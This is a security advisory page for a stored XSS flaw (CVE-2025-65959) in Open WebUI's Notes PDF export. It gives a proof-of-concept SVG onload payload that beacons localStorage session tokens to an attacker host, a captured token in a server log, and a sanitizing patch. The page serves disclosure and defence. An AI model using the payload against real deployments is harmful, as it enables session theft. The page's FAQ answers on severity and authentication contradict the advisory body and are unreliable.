CVE-2025-65959: Open WebUI vulnerable to Stored DOM XSS via Note 'Download PDF'

Published Dec 4, 2025
·
Updated

Summary

A Stored XSS vulnerability has been discovered in Open-WebUI's Notes PDF download functionality. An attacker can import a Markdown file containing malicious SVG tags into Notes, allowing them to execute arbitrary JavaScript code and steal session tokens when a victim downloads the note as PDF.

This vulnerability can be exploited by any authenticated user, and unauthenticated external attackers can steal session tokens from users (both admin and regular users) by sharing specially crafted markdown files.

Details

Vulnerability Location

File: src/lib/components/notes/utils.ts Function: downloadPdf() Vulnerable Code (Line 35):

typescript const contentNode = document.createElement('div');

contentNode.innerHTML = html; // Direct assignment without DOMPurify sanitization

node.appendChild(contentNode); document.body.appendChild(node);

Root Cause

1. Incomplete TipTap Editor Configuration - Open-WebUI only uses TipTap StarterKit - No Schema definition for dangerous tags like SVG, Script - Unknown HTML tags are stored as raw HTML 2. Missing Sanitization During PDF Generation - note.data.content.html is directly assigned to innerHTML - No DOMPurify or other sanitization - Stored malicious HTML executes as-is

PoC

Environment - Open-WebUI latest version (v0.6.36) - Admin account

Step 1: Create Malicious Markdown File

Filename: tokenstealer.md

markdown <svg onload="navigator.sendBeacon('https://redacted/steal',localStorage.token)"></svg> navigator.sendBeacon() was used to bypass CORS.

Step 2: Import to Notes

1. Login to Open-WebUI 2. Click "Notes" in the left menu 3. Drag and drop the Markdown file 4. Note is automatically created

Step 3: Trigger PDF Download

1. Access Notes menu (/notes) 2. Click ⋯ on the right side of the uploaded note 3. Select "Download" → "PDF document (.pdf)" 4. JavaScript executes

Step 4: Verify Token Theft

Attacker's server log: http POST /steal HTTP/1.1 Host: redacted Content-Type: text/plain;charset=UTF-8 Content-Length: 145

eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6IjVkMjE4ZmU4LTU2MTktNGEzNS05MWZkLTM2MzA3NDU1NGFkNCJ9.zOicE5c5FJ3ZOc9j6T2xHU-K6dbz-s1ibhIG4LayFw

And Simple PoC alert(1) Filename: simplepoc.md

markdown <svg onload="alert(1)"></svg> <img width="1089" height="310" alt="image" src="https://github.com/user-attachments/assets/ded7bb4a-d0e0-4614-8d64-3113c1f79e2f" />

---

Impact

CVSS 3.1 Score: 8.7 (High)

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N

Vulnerability Type CWE-79: Cross-site Scripting (XSS) CWE-116: Improper Encoding or Escaping of Output

Affected Users - All Open-WebUI users - Especially users utilizing the Notes feature

Attack Scenario 1. Attacker shares malicious note (.md file) in the community 2. Victim uploads the shared note (.md file) 3. Victim downloads as PDF 4. XSS vulnerability triggers 5. Victim's session (localStorage.token) is stolen

---

Recommended Patch

typescript // src/lib/components/notes/utils.ts:35 import DOMPurify from 'dompurify';

const contentNode = document.createElement('div');

// Sanitize with DOMPurify contentNode.innerHTML = DOMPurify.sanitize(html, { ALLOWEDTAGS: [ 'p', 'br', 'strong', 'em', 'u', 'h1', 'h2', 'h3', 'h4', 'h5', 'h6', 'ul', 'ol', 'li', 'a', 'code', 'pre', 'blockquote', 'table', 'thead', 'tbody', 'tr', 'td', 'th' ], ALLOWEDATTR: ['href', 'class', 'target'], FORBIDTAGS: ['svg', 'script', 'iframe', 'object', 'embed', 'style'], FORBIDATTR: ['onload', 'onerror', 'onclick', 'onmouseover', 'onfocus'], ALLOWDATAATTR: false });

node.appendChild(contentNode);

---

References

- OWASP XSS Prevention Cheat Sheet: https://cheatsheetseries.owasp.org/cheatsheets/CrossSiteScriptingPreventionCheatSheet.html - DOMPurify: https://github.com/cure53/DOMPurify

---

Other sources

Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.6.37, a Stored XSS vulnerability was discovered in Open-WebUI's Notes PDF download functionality. An attacker can import a Markdown file containing malicious SVG tags into Notes, allowing them to execute arbitrary JavaScript code and steal session tokens when a victim downloads the note as PDF. This vulnerability can be exploited by any authenticated user, and unauthenticated external attackers can steal session tokens from users (both admin and regular users) by sharing specially crafted markdown files. This vulnerability is fixed in 0.6.37.

NVD

Affected Software

3 affected componentsFixes available
Open WebUI Open-WebUI<0.6.37
npm/open-webui<=0.6.36
0.6.37
openwebui Open WebUI<0.6.37

Event History

Dec 4, 2025
CVE Published
via MITRE·08:46 PM
Data Sourced
via MITRE·08:46 PM
DescriptionSeverityWeakness
Data Sourced
via NVD·09:16 PM
RemedyDescriptionSeverityWeaknessAffected Software
Advisory Published
via GitHub·10:03 PM
Data Sourced
via GitHub·10:03 PM
DescriptionSeverityWeaknessAffected Software

Frequently Asked Questions

1

What is the severity of CVE-2025-65959?

The severity of CVE-2025-65959 is critical due to its potential for remote execution through Stored XSS.

2

How do I fix CVE-2025-65959?

You can fix CVE-2025-65959 by upgrading Open-WebUI to version 0.6.37 or later.

3

What type of vulnerability is CVE-2025-65959?

CVE-2025-65959 is a Stored Cross-Site Scripting (XSS) vulnerability.

4

What functionality is affected by CVE-2025-65959?

CVE-2025-65959 affects the Notes PDF download functionality in Open-WebUI.

5

Can CVE-2025-65959 be exploited without authentication?

Yes, CVE-2025-65959 can be exploited by an attacker without needing to authenticate.

Contact

SecAlerts Pty Ltd.
132 Wickham Terrace
Fortitude Valley,
QLD 4006, Australia
info@secalerts.co
By using SecAlerts services, you agree to our services end-user license agreement. This website is safeguarded by reCAPTCHA and governed by the Google Privacy Policy and Terms of Service. All names, logos, and brands of products are owned by their respective owners, and any usage of these names, logos, and brands for identification purposes only does not imply endorsement. If you possess any content that requires removal, please get in touch with us.
© 2026 SecAlerts Pty Ltd.
ABN: 70 645 966 203, ACN: 645 966 203